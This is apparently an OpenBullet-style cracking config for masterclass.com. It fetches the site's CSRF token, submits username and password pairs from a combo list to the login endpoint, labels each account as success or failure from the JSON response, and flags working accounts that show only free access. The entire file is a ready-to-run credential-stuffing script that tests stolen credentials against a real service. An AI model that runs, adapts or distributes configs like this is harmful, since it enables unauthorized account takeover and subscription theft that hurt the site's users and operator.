[SETTINGS]
{
  "Name": "Master Class",
  "SuggestedBots": 1,
  "LastModified": "2019-04-21T20:53:16.4145793-05:00",
  "AdditionalInfo": "",
  "Author": "FFaez1267",
  "Version": "1.0.2",
  "IgnoreResponseErrors": false,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
REQUEST GET "https://www.masterclass.com/" 
  
  HEADER "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

PARSE "<SOURCE>" LR "<meta name=\"csrf-token\" content=\"" "\" /><" -> VAR "TOKEN" 

REQUEST POST "https://www.masterclass.com/auth/identity/callback" 
  CONTENT "next_page=&auth_key=<USER>&password=<PASS>&provider=identity" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER "x-csrf-token: <TOKEN>" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "status\":\"success\",\"" 
  KEYCHAIN Failure OR 
    KEY "status\":\"failed" 

REQUEST GET "https://www.masterclass.com/" 
  
  HEADER "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER "x-csrf-token: <TOKEN>" 

KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Custom "FREE" OR 
    KEY "Start your first class" 

